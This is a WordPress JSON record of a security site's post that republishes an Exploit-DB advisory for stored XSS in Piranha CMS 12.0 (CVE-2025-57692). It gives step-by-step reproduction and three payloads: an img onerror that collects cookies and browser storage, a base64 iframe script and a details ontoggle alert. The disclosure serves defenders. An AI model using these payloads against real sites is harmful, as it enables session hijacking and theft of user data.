{"id":38487,"date":"2026-02-02T03:55:15","date_gmt":"2026-02-02T03:55:15","guid":{"rendered":"http:\/\/localhost\/?p=38487"},"modified":"2026-02-02T03:55:15","modified_gmt":"2026-02-02T03:55:15","slug":"piranha-cms-120-stored-xss-in-text-block","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38487","title":{"rendered":"Piranha CMS 12.0 &#8211; Stored XSS in Text Block_EDB-ID:52471"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-02T09:28:04&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Piranha CMS 12.0 &#8211; Stored Cross Site Scripting Date: 2025-09-26 Exploit Author: Chidubem Chukwu Terminal Venom LinkedIn : https:\/\/www.linkedin.com\/in\/chidubem-chukwu-20bb202a9? Vendor Homepage: https:\/\/piranhacms.org Software Link:&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;Piranha CMS 12.0 &#8211; Stored XSS in Text Block&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52471&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-57692&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: Piranha CMS 12.0 &#8211; Stored Cross Site Scripting \\r\\n# Date: 2025-09-26\\r\\n# Exploit Author: Chidubem Chukwu (Terminal Venom)\\r\\n# LinkedIn : https:\/\/www.linkedin.com\/in\/chidubem-chukwu-20bb202a9?\\r\\n# Vendor Homepage: https:\/\/piranhacms.org\\r\\n# Software Link: https:\/\/github.com\/PiranhaCMS\/piranha.core\/releases\/tag\/v12.0\\r\\n# Version: 12.0\\r\\n# Category: Web Application\\r\\n# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome \\r\\n# CVE: CVE-2025-57692\\r\\n# Privilege Level: authenticated user\\r\\n# Patched Version: Not available\\r\\n# Exploit link: 
https:\/\/github.com\/Saconyfx\/security-advisories\/blob\/main\/CVE-2025-57692\/advisory.md\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n## Reproduction Steps ##\\r\\n\\r\\nPiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via \/manager\/pages, enabling execution of arbitrary JavaScript in another user&#8217;s browser.\\r\\n\\r\\nReproduction steps \\r\\n\\r\\n\\t1.\\tLog in to the Piranha admin panel at https:\/\/\\u003chost\\u003e\/manager\/login.\\r\\n\\r\\n\\t2.\\tNavigate to Pages.\\r\\n\\r\\n\\t3.\\tClick Add Page and choose Standard Page or Standard Archive.\\r\\n\\r\\n\\t4.\\tEnter a page title (e.g., XSS-Test).\\r\\n\\r\\n\\t5.\\tClick the [ + ] button and select Text under Content to add a Text block.\\r\\n\\r\\n\\t6.\\tIn the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted\/saved and will also execute for anyone who later accesses or previews the page.\\r\\n\\r\\nPayload A \\r\\n\\r\\n\\u003cimg src=\\&#8221;x\\&#8221; onerror=\\&#8221;\\r\\n  alert(\\r\\n    &#8216;Cookies: &#8216; + document.cookie + &#8216;\\\\n&#8217; +\\r\\n    &#8216;LocalStorage: &#8216; + JSON.stringify(localStorage) + &#8216;\\\\n&#8217; +\\r\\n    &#8216;SessionStorage: &#8216; + JSON.stringify(sessionStorage) + &#8216;\\\\n&#8217; +\\r\\n    &#8216;URL: &#8216; + window.location.href + &#8216;\\\\n&#8217; +\\r\\n    &#8216;User Agent: &#8216; + navigator.userAgent + &#8216;\\\\n&#8217; +\\r\\n    &#8216;Time: &#8216; + new Date().toLocaleString()\\r\\n  )\\r\\n\\&#8221; \/\\u003e\\r\\n\\r\\nPayload B \u2014 iframe base64 \\r\\n\\r\\n\\u003ciframe src=\\&#8221;data:text\/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\&#8221;\\u003e\\u003c\/iframe\\u003e\\r\\n\\r\\nPayload C \u2014 details toggle (on-toggle alert)\\r\\n\\r\\n\\u003cdetails open ontoggle=alert(&#8216;XSS&#8217;)\\u003eClick\\u003c\/details\\u003e\\r\\n\\r\\n\\t7.\\tClick Save. 
The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).\\r\\n\\r\\n\\t8.\\tAnyone who accesses the page (or pastes the payload) will trigger the XSS.&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/www.exploit-db.com\/raw\/52471&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:6.8,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:U\/C:H\/I:L\/A:L&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.exploit-db.com\/exploits\/52471&#8243;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,
&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-02T09:28:04&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Piranha CMS 12.0 &#8211; Stored Cross Site Scripting Date: 2025-09-26 Exploit Author: Chidubem Chukwu Terminal Venom LinkedIn : https:\/\/www.linkedin.com\/in\/chidubem-chukwu-20bb202a9? Vendor Homepage: https:\/\/piranhacms.org Software&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,25,12,40,21,13,7,11,5],"class_list":["post-38487","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-68","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Piranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38487\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Piranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-02T09:28:04&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Piranha CMS 12.0 &#8211; Stored Cross Site Scripting Date: 2025-09-26 Exploit Author: Chidubem Chukwu Terminal Venom LinkedIn : https:\/\/www.linkedin.com\/in\/chidubem-chukwu-20bb202a9? 
Vendor Homepage: https:\/\/piranhacms.org Software...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38487\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-02T03:55:15+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Piranha CMS 12.0 &#8211; Stored XSS in Text Block_EDB-ID:52471\",\"datePublished\":\"2026-02-02T03:55:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487\"},\"wordCount\":592,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.8\",\"exploit\",\"exploitdb\",\"MEDIUM\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38487#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487\",\"name\":\"Piranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero 
redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-02T03:55:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38487\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Piranha CMS 12.0 &#8211; Stored XSS in Text Block_EDB-ID:52471\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 
redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Piranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38487","og_locale":"en_US","og_type":"article","og_title":"Piranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-02T09:28:04&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Piranha CMS 12.0 &#8211; Stored Cross Site Scripting Date: 2025-09-26 Exploit Author: Chidubem Chukwu Terminal Venom LinkedIn : https:\/\/www.linkedin.com\/in\/chidubem-chukwu-20bb202a9? Vendor Homepage: https:\/\/piranhacms.org Software...","og_url":"https:\/\/zero.redgem.net\/?p=38487","og_site_name":"zero redgem","article_published_time":"2026-02-02T03:55:15+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. 
reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38487#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38487"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Piranha CMS 12.0 &#8211; Stored XSS in Text Block_EDB-ID:52471","datePublished":"2026-02-02T03:55:15+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38487"},"wordCount":592,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.8","exploit","exploitdb","MEDIUM","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38487#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38487","url":"https:\/\/zero.redgem.net\/?p=38487","name":"Piranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-02T03:55:15+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38487#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38487"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38487#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Piranha CMS 12.0 &#8211; Stored XSS in Text Block_EDB-ID:52471"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero 
redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38487","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38487"}],"version-history":[{"count":0,"href":"htt
ps:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38487\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38487"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38487"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38487"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}